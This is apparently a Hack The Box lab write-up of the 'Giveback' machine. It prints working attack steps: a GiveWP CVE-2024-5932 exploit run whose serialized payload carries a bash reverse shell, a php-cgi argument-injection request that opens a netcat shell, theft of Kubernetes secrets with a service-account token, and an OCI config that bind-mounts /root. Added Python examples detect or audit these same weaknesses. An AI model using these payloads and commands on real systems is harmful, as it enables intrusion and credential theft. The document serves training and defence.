Hack The Box: Giveback
GiveBack is a medium-difficulty Linux machine from Hack The Box. We exploited an unauthenticated PHP object injection in the GiveWP plugin (CVE-2024-5932) to achieve remote code execution inside a Kubernetes pod running WordPress → used the initial reverse shell to abuse a legacy PHP-CGI endpoint with allow_url_include + auto_prepend_file to escape the pod and reach another container → enumerated Kubernetes API secrets via the service account token to recover the MASTERPASS password for user babywyrm → discovered sudo privileges to run /opt/debug → created a malicious OCI container configuration that bind-mounted /root and executed cat /root/root.txt inside a new namespace to read the root flag directly.
Enumeration
Nmap Scan
┌──(sanke㉿vbox)-[~/Downloads/giveback]
└─$ sudo nmap -A -v 10.10.11.94
[sudo] password for sanke:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-02 10:08 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 66:f8:9c:58:f4:b8:59:bd:cd:ec:92:24:c3:97:8e:9e (ECDSA)
|_ 256 96:31:8a:82:1a:65:9f:0a:a2:6c:ff:4d:44:7c:d3:94 (ED25519)
80/tcp open http nginx 1.28.0
| http-methods:
|_ Supported Methods: HEAD OPTIONS
|_http-title: 503 Service Temporarily Unavailable
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Uptime guess: 37.848 days (since Thu Sep 25 14:48:12 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Exploitation
https://github.com/EQSTLab/CVE-2024-5932
┌──(venv)─(sanke㉿vbox)-[~/Downloads/giveback/CVE-2024-5932]
└─$ python CVE-2024-5932-rce.py -u http://giveback.htb/donations/the-things-we-need -c "bash -c 'bash -i >& /dev/tcp/10.10.15.124/4444 0>&1'"
Author: EQST(Experts, Qualified Security Team)
Github: https://github.com/EQSTLab/CVE-2024-5932
Analysis base : https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin/
=============================================================================================================
CVE-2024-5932 : GiveWP unauthenticated PHP Object Injection
description: The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
Arbitrary File Deletion
=============================================================================================================
[\] Exploit loading, please wait...
[+] Requested Data:
{'give-form-id': '17', 'give-form-hash': '1a76ef6e19', 'give-price-id': '0', 'give-amount': '$10.00', 'give_first': 'Christopher', 'give_last': 'Keller', 'give_email': 'amanda34@example.com', 'give_title': 'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";s:10:"shell_exec";s:12:"\\0*\\0generator";O:34:"Give\\\\\\\\Onboarding\\\\\\\\SettingsRepository":1:{s:11:"\\0*\\0settings";a:1:{s:8:"address1";s:52:"bash -c \'bash -i >& /dev/tcp/10.10.15.124/4444 0>&1\'";}}s:13:"\\0*\\0maxRetries";i:10;}}}}}}', 'give-gateway': 'offline', 'action': 'give_process_donation'}
In another terminal, you will get the shell:
┌──(sanke㉿vbox)-[~/Downloads/giveback/CVE-2024-8353]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.15.124] from (UNKNOWN) [10.10.11.94] 33721
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
<s-967b59c58-z4r9g:/opt/bitnami/wordpress/wp-admin$
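A detection-side view of the request above, as an added example that is not part of the original write-up or of the EQST tool: it flags donation-form fields such as give_title whose value carries a PHP serialized object. The sample bodies are constructed and use harmless stdClass objects; the unslashing step is an assumption about how the application pre-processes input.

```python
import re
from urllib.parse import parse_qsl, urlencode

# O:<len>:"Class" or C:<len>:"Class" at the start of a value, or nested
# after ';' or '{' inside a serialized array. A leading '+' on the length
# is allowed because some PHP versions accept it.
OBJECT_TOKEN = re.compile(r'(?:^|[;{])\s*[OC]:\+?\d+:"')

def fields_with_serialized_objects(form_body: str) -> list[str]:
    """Return the names of form fields whose value embeds a PHP object."""
    flagged = []
    for name, value in parse_qsl(form_body, keep_blank_values=True):
        # Assumption: the application unslashes input before use, so
        # backslashes are dropped here to catch tokens such as O\:8\:"...
        if OBJECT_TOKEN.search(value.replace("\\", "")):
            flagged.append(name)
    return flagged

# Constructed donation-form bodies (harmless stdClass objects, no gadget chain).
BENIGN = urlencode({"give_first": "Ann", "give_title": "Dr.", "give-amount": "$10.00"})
DIRECT = urlencode({"give_first": "Ann", "give_title": 'O:8:"stdClass":0:{}'})
NESTED = urlencode({"give_title": 'a:1:{s:1:"k";O:8:"stdClass":0:{}}',
                    "give_last": 'O\\:8\\:"stdClass":0:{}'})

if __name__ == "__main__":
    for body in (BENIGN, DIRECT, NESTED):
        print(fields_with_serialized_objects(body))
```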
So we are inside a container, and it is running WordPress. Run this in the WordPress shell:
php -r '$u="http://10.43.2.241:5000/cgi-bin/php-cgi?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input"; $d="nc <IP> 4455 -e /bin/sh"; $h="Content-Type: application/x-www-form-urlencoded\r\nUser-Agent: curl/7.79.1\r\n"; $ctx=stream_context_create(["http"=>["method"=>"POST","header"=>$h,"content"=>$d]]); echo file_get_contents($u,false,$ctx);'
Listen on your machine
┌──(sanke㉿vbox)-[~/Downloads/giveback/CVE-2024-5932]
└─$ nc -lvnp 4455
listening on [any] 4455 ...
connect to [10.10.16.223] from (UNKNOWN) [10.10.11.94] 25702
pwd
/var/www/html/cgi-bin
env
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT=tcp://10.43.0.1:443
HOSTNAME=legacy-intranet-cms-6f7bf5db84-b4z8d
PHP_INI_DIR=/usr/local/etc/php
BETA_VINO_WP_WORDPRESS_PORT=tcp://10.43.61.204:80
BETA_VINO_WP_WORDPRESS_SERVICE_PORT=80
LEGACY_INTRANET_SERVICE_SERVICE_HOST=10.43.2.241
WP_NGINX_SERVICE_SERVICE_PORT=80
WP_NGINX_SERVICE_PORT=tcp://10.43.4.242:80
SHLVL=4
PHP_CGI_VERSION=8.3.3
LEGACY_INTRANET_SERVICE_PORT_5000_TCP=tcp://10.43.2.241:5000
HOME=/root
PHP_LDFLAGS=-Wl,-O1 -pie
LEGACY_CGI_ENABLED=true
BETA_VINO_WP_WORDPRESS_PORT_80_TCP_ADDR=10.43.61.204
BETA_VINO_WP_MARIADB_PORT_3306_TCP_ADDR=10.43.147.82
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
WP_NGINX_SERVICE_PORT_80_TCP_ADDR=10.43.4.242
PHP_VERSION=8.3.3
LEGACY_INTRANET_SERVICE_PORT=tcp://10.43.2.241:5000
LEGACY_INTRANET_SERVICE_SERVICE_PORT=5000
LEGACY_MODE=enabled
BETA_VINO_WP_MARIADB_PORT_3306_TCP_PORT=3306
BETA_VINO_WP_WORDPRESS_PORT_80_TCP_PORT=80
GPG_KEYS=1198C0117593497A5EC5C199286AF1F9897469DC C28D937575603EB4ABB725861C0779DC5C0A9DE4 AFD8691FDAEDF03BDF6E460563F15A9B715376CA
BETA_VINO_WP_MARIADB_SERVICE_HOST=10.43.147.82
BETA_VINO_WP_MARIADB_PORT_3306_TCP_PROTO=tcp
WP_NGINX_SERVICE_PORT_80_TCP_PORT=80
BETA_VINO_WP_WORDPRESS_PORT_80_TCP_PROTO=tcp
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
PHP_ASC_URL=https://www.php.net/distributions/php-8.3.3.tar.xz.asc
BETA_VINO_WP_MARIADB_SERVICE_PORT_MYSQL=3306
WP_NGINX_SERVICE_PORT_80_TCP_PROTO=tcp
PHP_URL=https://www.php.net/distributions/php-8.3.3.tar.xz
PHP_MAX_EXECUTION_TIME=120
KUBERNETES_PORT_443_TCP_ADDR=10.43.0.1
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
BETA_VINO_WP_MARIADB_SERVICE_PORT=3306
BETA_VINO_WP_MARIADB_PORT=tcp://10.43.147.82:3306
BETA_VINO_WP_WORDPRESS_PORT_443_TCP_ADDR=10.43.61.204
KUBERNETES_PORT_443_TCP_PORT=443
BETA_VINO_WP_WORDPRESS_PORT_80_TCP=tcp://10.43.61.204:80
BETA_VINO_WP_MARIADB_PORT_3306_TCP=tcp://10.43.147.82:3306
PHP_MEMORY_LIMIT=128M
KUBERNETES_PORT_443_TCP_PROTO=tcp
WP_NGINX_SERVICE_PORT_80_TCP=tcp://10.43.4.242:80
CMS_ENVIRONMENT=development
BETA_VINO_WP_WORDPRESS_PORT_443_TCP_PORT=443
BETA_VINO_WP_WORDPRESS_PORT_443_TCP_PROTO=tcp
BETA_VINO_WP_WORDPRESS_SERVICE_PORT_HTTP=80
WP_NGINX_SERVICE_SERVICE_PORT_HTTP=80
KUBERNETES_PORT_443_TCP=tcp://10.43.0.1:443
KUBERNETES_SERVICE_PORT_HTTPS=443
PHPIZE_DEPS=autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2c
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_ADDR=10.43.2.241
KUBERNETES_SERVICE_HOST=10.43.0.1
PWD=/var/www/html/cgi-bin
PHP_SHA256=b0a996276fe21fe9ca8f993314c8bc02750f464c7b0343f056fb0894a8dfa9d1
BETA_VINO_WP_WORDPRESS_PORT_443_TCP=tcp://10.43.61.204:443
BETA_VINO_WP_WORDPRESS_SERVICE_PORT_HTTPS=443
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PORT=5000
BETA_VINO_WP_WORDPRESS_SERVICE_HOST=10.43.61.204
WP_NGINX_SERVICE_SERVICE_HOST=10.43.4.242
LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PROTO=tcp
LEGACY_INTRANET_SERVICE_SERVICE_PORT_HTTP=5000
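How the php-cgi request used above looks in an access log, as an added example that is not part of the original write-up: the query string has no unencoded '=', so a CGI handler receives its '+'-separated parts as command-line arguments, and the %AD byte stands in for a dash. The log lines are constructed, and the log format and the auto_append_file entry are assumptions.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, unquote_to_bytes

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
DASH_LIKE = (0x2D, 0xAD)  # '-' and the %AD byte seen in the request above
# Directives from the request above; auto_append_file is added by assumption.
RISKY_INI = (b"allow_url_include", b"auto_prepend_file", b"auto_append_file")

def classify(log_line: str) -> Optional[str]:
    """Return 'high', 'medium' or None for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    # RFC 3875: a query string without an unencoded '=' is passed to the
    # CGI program as command-line arguments, split on '+'.
    if not query or "=" in query:
        return None
    args = [unquote_to_bytes(part) for part in query.split("+") if part]
    if not any(arg[0] in DASH_LIKE for arg in args):
        return None
    if any(ini in arg for arg in args for ini in RISKY_INI):
        return "high"    # switch plus an ini override that enables code inclusion
    return "medium"      # a switch-like argument reached a CGI binary

# Constructed nginx-style log lines; addresses and timestamps are made up.
SAMPLE_LOG = [
    '10.42.1.7 - - [08/Nov/2025:13:50:01 +0000] "POST /cgi-bin/php-cgi?%ADd+allow_url_include'
    '%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    '10.42.1.7 - - [08/Nov/2025:13:50:09 +0000] "GET /cgi-bin/php-cgi?-s HTTP/1.1" 200 90 "-" "-"',
    '10.42.1.9 - - [08/Nov/2025:13:51:30 +0000] "GET /index.php?page=2 HTTP/1.1" 200 4096 "-" "-"',
    '10.42.1.9 - - [08/Nov/2025:13:51:42 +0000] "GET /search?q HTTP/1.1" 200 120 "-" "-"',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), line[:70])
```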
The environment contains KUBERNETES variables, so let's enumerate the k8s secrets from the compromised pod (or via that shell):
curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://kubernetes.default.svc/api/v1/namespaces/default/secrets
You will get a lot of encoded data back, but what we need here is the MASTERPASS password, which is base64-encoded:
"type": "helm.sh/release.v1"
},
{
"metadata": {
"name": "user-secret-babywyrm",
"namespace": "default",
"uid": "946de928-3137-405d-be06-fdf7777418f4",
"resourceVersion": "2855783",
"creationTimestamp": "2025-11-08T13:35:05Z",
"ownerReferences": [
{
"apiVersion": "bitnami.com/v1alpha1",
"kind": "SealedSecret",
"name": "user-secret-babywyrm",
"uid": "996226d2-c924-48e5-b85a-9da1981dc880",
"controller": true
}
],
"managedFields": [
{
"manager": "controller",
"operation": "Update",
"apiVersion": "v1",
"time": "2025-11-08T13:35:05Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:data": {
".": {},
"f:MASTERPASS": {}
},
"f:metadata": {
"f:ownerReferences": {
".": {},
"k:{\"uid\":\"996226d2-c924-48e5-b85a-9da1981dc880\"}": {}
}
},
"f:type": {}
}
}
]
},
"data": {
"MASTERPASS": "aldQd2VCQ2MycUxGczVjczNsRjF3MERabnZGRFlwNng="
},
"type": "Opaque"
},
{
"metadata": {
"name": "user-secret-margotrobbie",
"namespace": "default",
"uid": "5eadfcb6-a3c9-4805-8d92-9e099baef169",
"resourceVersion": "2855851",
"creationTimestamp": "2025-11-08T13:35:13Z",
"ownerReferences": [
{
"apiVersion": "bitnami.com/v1alpha1",
"kind": "SealedSecret",
"name": "user-secret-margotrobbie",
"uid": "2e420823-32ae-4b94-882c-bccb5f3b285f",
"controller": true
}
],
"managedFields": [
{
"manager": "controller",
"operation": "Update",
"apiVersion": "v1",
"time": "2025-11-08T13:35:13Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:data": {
".": {},
"f:USER_PASSWORD": {}
},
"f:metadata": {
"f:ownerReferences": {
".": {},
"k:{\"uid\":\"2e420823-32ae-4b94-882c-bccb5f3b285f\"}": {}
}
},
"f:type": {}
}
}
]
},
"data": {
"USER_PASSWORD": "dk00NVhDc2NtQ20wYkVzcTZ2cjBsQzVvY091eWUxWQ=="
},
"type": "Opaque"
},
{
"metadata": {
"name": "user-secret-sydneysweeney",
"namespace": "default",
"uid": "719d1d52-84a3-46d8-81c7-3350d6777939",
"resourceVersion": "2855829",
"creationTimestamp": "2025-11-08T13:35:10Z",
"ownerReferences": [
{
"apiVersion": "bitnami.com/v1alpha1",
"kind": "SealedSecret",
"name": "user-secret-sydneysweeney",
"uid": "f1c788cb-2349-4cea-827a-8f6ec9566fb3",
"controller": true
}
],
"managedFields": [
{
"manager": "controller",
"operation": "Update",
"apiVersion": "v1",
"time": "2025-11-08T13:35:10Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:data": {
".": {},
"f:USER_PASSWORD": {}
},
"f:metadata": {
"f:ownerReferences": {
".": {},
"k:{\"uid\":\"f1c788cb-2349-4cea-827a-8f6ec9566fb3\"}": {}
}
},
"f:type": {}
}
}
]
},
"data": {
"USER_PASSWORD": "ZnlQZk1HYktXcTJtc05Xam11N1p4T3F3MWNoSmxzZVg="
},
"type": "Opaque"
}
]
}
Here is the base64 password:
"MASTERPASS": "aldQd2VCQ2MycUxGczVjczNsRjF3MERabnZGRFlwNng="
Let's decode it now using a simple Linux command.
┌──(sanke㉿vbox)-[~/Downloads/giveback/CVE-2024-5932]
└─$ echo "aldQd2VCQ2MycUxGczVjczNsRjF3MERabnZGRFlwNng=" | base64 -d
jWPweBCc2qLFs5cs3lF1w0DZnvFDYp6x
Let's gooo!! We have our password. Let's get the user flag now!
BTW the password is always changing, so it will not be the same.
┌──(sanke㉿vbox)-[~/Downloads/giveback/CVE-2024-5932]
└─$ ssh babywyrm@giveback.htb
babywyrm@giveback.htb's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-124-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Sat Nov 8 13:54:10 2025 from 10.10.16.223
babywyrm@giveback:~$ cat user.txt
<USER_FLAG>
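The secrets listing above succeeded because the pod's service account token was authorised to list Secrets in the default namespace. The following added example, not part of the original write-up, audits Role and RoleBinding objects for service accounts with that access; the role, binding and service account names are constructed, since the page does not show the cluster's RBAC objects.

```python
READ_VERBS = {"get", "list", "watch", "*"}

def secret_read_verbs(role: dict) -> set:
    """Verbs in a Role that allow reading every Secret in its namespace."""
    verbs = set()
    for rule in role.get("rules", []):
        core_group = {"", "*"} & set(rule.get("apiGroups", []))
        secrets = {"secrets", "*"} & set(rule.get("resources", []))
        # Rules pinned to resourceNames are treated as scoped and skipped.
        if core_group and secrets and not rule.get("resourceNames"):
            verbs |= READ_VERBS & set(rule.get("verbs", []))
    return verbs

def exposed_service_accounts(roles: list, bindings: list) -> list:
    """Return (namespace/serviceaccount, verbs) pairs that can read Secrets.
    Only Role + RoleBinding are resolved; ClusterRoles are out of scope here."""
    index = {(r["metadata"]["namespace"], r["metadata"]["name"]): r for r in roles}
    findings = []
    for binding in bindings:
        ns = binding["metadata"]["namespace"]
        ref = binding["roleRef"]
        role = index.get((ns, ref["name"])) if ref["kind"] == "Role" else None
        verbs = secret_read_verbs(role) if role else set()
        for subject in binding.get("subjects", []) if verbs else []:
            if subject["kind"] == "ServiceAccount":
                name = f'{subject.get("namespace", ns)}/{subject["name"]}'
                findings.append((name, sorted(verbs)))
    return findings

# Constructed objects in the shape of `kubectl get roles,rolebindings -o json` items.
def _meta(name):
    return {"namespace": "default", "name": name}

ROLES = [
    {"metadata": _meta("cms-secret-reader"),
     "rules": [{"apiGroups": [""], "resources": ["secrets"], "verbs": ["get", "list"]}]},
    {"metadata": _meta("config-reader"),
     "rules": [{"apiGroups": [""], "resources": ["configmaps"], "verbs": ["get"]}]},
]
BINDINGS = [
    {"metadata": _meta("cms-binding"), "roleRef": {"kind": "Role", "name": "cms-secret-reader"},
     "subjects": [{"kind": "ServiceAccount", "name": "legacy-cms-sa", "namespace": "default"}]},
    {"metadata": _meta("web-binding"), "roleRef": {"kind": "Role", "name": "config-reader"},
     "subjects": [{"kind": "ServiceAccount", "name": "web-sa"}]},
]

if __name__ == "__main__":
    print(exposed_service_accounts(ROLES, BINDINGS))
```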
Privilege Escalation
Our famous command in this phase, which we always need to check, is "sudo -l", and I guess we have something interesting here.
babywyrm@giveback:~$ sudo -l
Matching Defaults entries for babywyrm on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, timestamp_timeout=0, timestamp_timeout=20
User babywyrm may run the following commands on localhost:
(ALL) NOPASSWD: !ALL
(ALL) /opt/debug
babywyrm@giveback:~$ mkdir -p ~/readflag
babywyrm@giveback:~$ cd ~/readflag
# Create the rootfs directory that runc expects
babywyrm@giveback:~$ mkdir rootfs
# Now we create the config file
cat > config.json << 'EOF'
{
"ociVersion": "1.0.2",
"process": {
"user": {"uid": 0, "gid": 0},
"args": ["/bin/cat", "/root/root.txt"],
"cwd": "/",
"env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],
"terminal": false
},
"root": {"path": "rootfs"},
"mounts": [
{"destination": "/proc", "type": "proc", "source": "proc"},
{"destination": "/dev", "type": "tmpfs", "source": "tmpfs", "options": ["nosuid","strictatime","mode=755","size=65536k"]},
{"destination": "/bin", "type": "bind", "source": "/bin", "options": ["bind","ro"]},
{"destination": "/lib", "type": "bind", "source": "/lib", "options": ["bind","ro"]},
{"destination": "/lib64", "type": "bind", "source": "/lib64", "options": ["bind","ro"]},
{"destination": "/root", "type": "bind", "source": "/root", "options": ["bind","ro"]},
{"destination": "/usr", "type": "bind", "source": "/usr", "options": ["bind","ro"]}
],
"linux": {
"namespaces": [
{"type": "pid"},
{"type": "network"},
{"type": "ipc"},
{"type": "uts"},
{"type": "mount"}
]
}
}
EOF
babywyrm@giveback:~$ sudo /opt/debug run rootfs
enter babywyrm pass : <REDACTED>
Please enter the administrative password : <REDACTED>
Both passwords verified. Executing the command ...
<ROOT_FLAG>
PWNEED!!!!
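The config.json above works because it runs as uid 0 with no user namespace and bind-mounts a host directory. The following added example, not part of the original write-up and not the logic of /opt/debug, shows the checks a privileged wrapper could apply to a caller-supplied OCI config before running it; the list of sensitive paths and the safer config are assumptions.

```python
import posixpath

# Assumed policy: host paths that must never be bind-mounted into a container.
SENSITIVE = ("/root", "/etc", "/home", "/var", "/proc", "/sys")

def _host_path(source: str) -> str:
    """Normalise a mount source so /root/../root and //root compare as /root."""
    return posixpath.normpath("/" + source.lstrip("/"))

def lint_oci_config(cfg: dict) -> list:
    """Return findings for an OCI runtime config before it is handed to a runtime."""
    findings = []
    namespaces = {n["type"] for n in cfg.get("linux", {}).get("namespaces", [])}
    uid = cfg.get("process", {}).get("user", {}).get("uid", 0)
    if uid == 0 and "user" not in namespaces:
        findings.append("uid 0 without a user namespace: container root is host root")
    for mount in cfg.get("mounts", []):
        is_bind = mount.get("type") == "bind" or {"bind", "rbind"} & set(mount.get("options", []))
        if not is_bind:
            continue
        src = _host_path(mount.get("source", ""))
        # String check only; symlinked sources need resolving on the host.
        if src == "/" or any(src == base or src.startswith(base + "/") for base in SENSITIVE):
            findings.append(f"bind mount of host path {src} at {mount.get('destination')}")
    return findings

# The page's config.json, trimmed to the fields the checks read.
PAGE_CONFIG = {
    "process": {"user": {"uid": 0, "gid": 0}, "args": ["/bin/cat", "/root/root.txt"]},
    "mounts": [
        {"destination": "/proc", "type": "proc", "source": "proc"},
        {"destination": "/bin", "type": "bind", "source": "/bin", "options": ["bind", "ro"]},
        {"destination": "/root", "type": "bind", "source": "/root", "options": ["bind", "ro"]},
    ],
    "linux": {"namespaces": [{"type": "pid"}, {"type": "mount"}]},
}
# Constructed counterpart: unprivileged uid, user namespace, no sensitive host path.
SAFER_CONFIG = {
    "process": {"user": {"uid": 1000, "gid": 1000}, "args": ["/bin/ls", "/"]},
    "mounts": [{"destination": "/bin", "type": "bind", "source": "/bin", "options": ["bind", "ro"]}],
    "linux": {"namespaces": [{"type": "pid"}, {"type": "mount"}, {"type": "user"}]},
}

if __name__ == "__main__":
    for finding in lint_oci_config(PAGE_CONFIG):
        print(finding)
```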

